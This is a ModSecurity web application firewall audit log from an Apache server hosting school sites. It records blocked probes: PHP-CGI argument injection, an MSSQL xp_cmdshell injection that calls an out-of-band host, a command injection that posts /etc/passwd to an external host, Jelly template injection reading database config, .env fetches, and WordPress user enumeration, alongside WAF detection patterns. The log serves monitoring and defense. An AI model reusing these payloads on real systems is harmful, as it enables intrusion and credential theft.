[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748507377419114 5062 (- - -) Stopwatch2: 1748507377419114 5062; combined=3460, p1=570, p2=2858, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7326b724-Z-- --d7a18571-A-- [29/May/2025:15:29:38 +0700] aDga8mMaQtTb69S13pgTuQAAAEM 103.236.140.4 40556 103.236.140.4 8181 --d7a18571-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 153697469 --d7a18571-C-- --d7a18571-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7a18571-E-- --d7a18571-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748507378414589 3614 (- - -) Stopwatch2: 1748507378414589 3614; combined=2070, p1=407, p2=1635, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7a18571-Z-- --f258dc5e-A-- [29/May/2025:15:29:39 +0700] aDga88X5pbyFXv2T3ip3FQAAAMU 103.236.140.4 40600 103.236.140.4 8181 --f258dc5e-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169379778 --f258dc5e-C-- --f258dc5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f258dc5e-E-- --f258dc5e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748507379414909 3234 (- - -) Stopwatch2: 1748507379414909 3234; combined=2041, p1=506, p2=1506, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f258dc5e-Z-- --623a7938-A-- [29/May/2025:15:29:40 +0700] aDga9P4vV4CoZ0MKLMP7ZQAAAIU 103.236.140.4 40652 103.236.140.4 8181 --623a7938-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165263797 --623a7938-C-- --623a7938-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --623a7938-E-- --623a7938-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748507380415395 3670 (- - -) Stopwatch2: 1748507380415395 3670; combined=2120, p1=433, p2=1655, p3=0, p4=0, p5=31, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --623a7938-Z-- --739c6f24-A-- [29/May/2025:15:30:15 +0700] aDgbF_4vV4CoZ0MKLMP7xQAAAI4 103.236.140.4 42258 103.236.140.4 8181 --739c6f24-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165264400 --739c6f24-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0rjil9gpeoh536h8tf07b7jbowjmi8fz.oast.live'-- --739c6f24-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 
--739c6f24-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748507415863963 4420 (- - -) Stopwatch2: 1748507415863963 4420; combined=3055, p1=656, p2=2291, p3=36, p4=42, p5=30, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --739c6f24-Z-- --d502e878-A-- [29/May/2025:15:34:12 +0700] aDgcBP4vV4CoZ0MKLMP-5QAAAIQ 103.236.140.4 53380 103.236.140.4 8181 --d502e878-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.178.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.178.241 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d502e878-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d502e878-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748507652742550 690 (- - -) Stopwatch2: 1748507652742550 690; combined=271, p1=237, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d502e878-Z-- --92edca5f-A-- [29/May/2025:15:44:50 +0700] aDgegmMaQtTb69S13pgWdgAAAEI 103.236.140.4 55070 103.236.140.4 8181 --92edca5f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.207.45.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.207.45.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --92edca5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92edca5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748508290274854 3302 (- - -) Stopwatch2: 1748508290274854 3302; combined=1521, p1=455, p2=1033, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92edca5f-Z-- --d77d2529-A-- [29/May/2025:15:56:14 +0700] aDghLv4vV4CoZ0MKLMP_QQAAAIY 103.236.140.4 55152 103.236.140.4 8181 --d77d2529-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153697984 --d77d2529-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d77d2529-E-- --d77d2529-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748508974279876 3148 (- - -) Stopwatch2: 1748508974279876 3148; combined=1192, p1=486, p2=676, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d77d2529-Z-- --05ea8360-A-- [29/May/2025:16:02:48 +0700] aDgiuP4vV4CoZ0MKLMP_VgAAAIA 103.236.140.4 55320 103.236.140.4 8181 --05ea8360-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.150.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.150.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --05ea8360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05ea8360-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748509368924991 3149 (- - -) Stopwatch2: 1748509368924991 3149; combined=1406, p1=467, p2=905, p3=0, p4=0, p5=33, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05ea8360-Z-- --71773667-A-- [29/May/2025:16:05:53 +0700] aDgjcWMaQtTb69S13pgWmgAAAEY 103.236.140.4 55378 103.236.140.4 8181 --71773667-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.56.213.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.56.213.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71773667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71773667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748509553546987 3224 (- - -) Stopwatch2: 1748509553546987 3224; combined=1412, p1=468, p2=910, p3=0, p4=0, p5=34, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71773667-Z-- --e8567e13-A-- [29/May/2025:16:26:41 +0700] aDgoUX1Ye2lUDKzW1LvtFwAAABM 103.236.140.4 55742 103.236.140.4 8181 --e8567e13-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 YaBrowser/18.11.1.715 (beta) Yowser/2.5 Safari/537.36 Accept-Charset: utf-8 --e8567e13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8567e13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748510801067921 686 (- - -) Stopwatch2: 1748510801067921 686; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8567e13-Z-- --95ca3770-A-- [29/May/2025:16:28:48 +0700] aDgo0H1Ye2lUDKzW1LvtHwAAAAc 103.236.140.4 55776 103.236.140.4 8181 --95ca3770-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169274273 --95ca3770-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0rjil9gpeoh536h8tf01o7ezf834mp8u.oast.live) --95ca3770-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95ca3770-E-- --95ca3770-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748510928447451 2232 (- - -) Stopwatch2: 1748510928447451 2232; combined=668, p1=399, p2=239, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95ca3770-Z-- --14029503-A-- [29/May/2025:16:28:49 +0700] aDgo0WMaQtTb69S13pgW4wAAAE4 103.236.140.4 55780 103.236.140.4 8181 --14029503-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153698110 --14029503-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --14029503-E-- --14029503-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748510929414704 2550 (- - -) Stopwatch2: 1748510929414704 2550; combined=1405, p1=376, p2=1001, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14029503-Z-- --f8cc4756-A-- [29/May/2025:16:30:02 +0700] aDgpGmMaQtTb69S13pgW6QAAAFE 103.236.140.4 55814 103.236.140.4 8181 --f8cc4756-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.152.13.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.152.13.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f8cc4756-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8cc4756-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748511002555723 3323 (- - -) Stopwatch2: 1748511002555723 3323; combined=1430, p1=537, p2=862, p3=0, p4=0, p5=31, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8cc4756-Z-- --3563af29-A-- [29/May/2025:17:05:11 +0700] aDgxV31Ye2lUDKzW1LvzIwAAAAY 103.236.140.4 37196 103.236.140.4 8181 --3563af29-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --3563af29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3563af29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748513111423101 787 (- - -) Stopwatch2: 1748513111423101 787; combined=342, p1=302, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
